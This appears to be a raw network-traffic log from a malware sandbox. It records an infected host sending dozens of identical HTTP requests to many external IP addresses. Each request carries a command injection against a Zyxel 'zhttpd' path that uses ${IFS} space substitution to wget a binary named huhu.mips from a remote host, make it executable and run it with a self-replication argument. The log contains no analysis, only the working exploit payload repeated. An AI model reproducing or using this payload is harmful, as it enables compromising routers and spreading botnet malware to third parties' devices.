                                            Feb 2, 2024 06:21:17.725481987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5592192.168.2.154450895.17.250.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725518942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5593192.168.2.1543758103.85.245.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725574970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5594192.168.2.1555748132.66.44.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725584984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5595192.168.2.1549832163.70.135.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725625038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5596192.168.2.155970669.246.76.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725670099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5597192.168.2.153690018.241.228.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725703955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5598192.168.2.154132657.143.35.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725753069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5599192.168.2.154874686.169.134.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725780964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5600192.168.2.153961277.102.59.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725824118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5601192.168.2.1542566155.160.154.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725867987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5602192.168.2.153357289.205.127.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725899935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5603192.168.2.1550434122.34.215.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725931883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5604192.168.2.1559008135.87.204.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.725969076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5605192.168.2.154413424.48.228.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726008892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5606192.168.2.1540166181.209.88.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726068974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5607192.168.2.1538540145.25.254.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726108074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5608192.168.2.153840690.126.181.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726157904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5609192.168.2.1557684118.107.192.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726202011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5610192.168.2.153338082.154.110.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726234913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5611192.168.2.154674653.124.108.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726283073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5612192.168.2.1553962188.39.101.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726311922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5613192.168.2.154119096.71.111.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726366043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5614192.168.2.1560000145.21.85.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726394892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5615192.168.2.155326218.196.3.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726438046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5616192.168.2.1550558151.198.34.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726459980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5617192.168.2.1551572101.193.252.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726509094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5618192.168.2.1533162222.242.241.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726557016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5619192.168.2.1554726124.123.120.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726615906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5620192.168.2.15502849.117.174.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726644039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5621192.168.2.1555354209.95.74.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726691961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5622192.168.2.1540938182.166.74.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726743937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5623192.168.2.1532928213.36.158.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726768970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5624192.168.2.154132682.184.82.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726818085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5625192.168.2.1533932151.102.200.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726877928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5626192.168.2.154215237.84.147.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726912022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5627192.168.2.1540102103.234.157.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726946115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5628192.168.2.1542554175.33.20.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.726975918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5629192.168.2.1547568182.156.9.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727027893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5630192.168.2.1535610153.99.128.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727050066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5631192.168.2.1534126128.57.144.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727087021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5632192.168.2.155702614.47.85.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727125883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5633192.168.2.1541628163.170.242.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727163076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5634192.168.2.1558732161.179.132.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727207899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5635192.168.2.1533532221.192.223.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727256060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5636192.168.2.154165012.212.102.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727303982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5637192.168.2.1535546173.196.83.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727336884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5638192.168.2.155315046.158.209.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727387905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5639192.168.2.1541106153.249.71.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727426052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5640192.168.2.1544458167.229.25.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727452993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5641192.168.2.155411476.133.45.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727510929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5642192.168.2.153719649.167.249.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727514029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5643192.168.2.154739049.75.67.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727571011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5644192.168.2.155010052.24.216.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727591991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5645192.168.2.1536966154.60.220.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727638006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5646192.168.2.1534150145.88.85.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727761984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5647192.168.2.1551002223.196.128.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727786064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5648192.168.2.154528437.168.73.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727812052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5649192.168.2.153281449.94.163.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727857113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5650192.168.2.153407097.122.22.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727906942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5651192.168.2.1554796146.66.52.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727936029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5652192.168.2.154478448.92.36.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727948904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5653192.168.2.1535664153.108.19.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.727996111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5654192.168.2.154481492.23.13.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728030920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5655192.168.2.1553172101.224.86.72443
                                            TimestampBytes transferredDirectionData
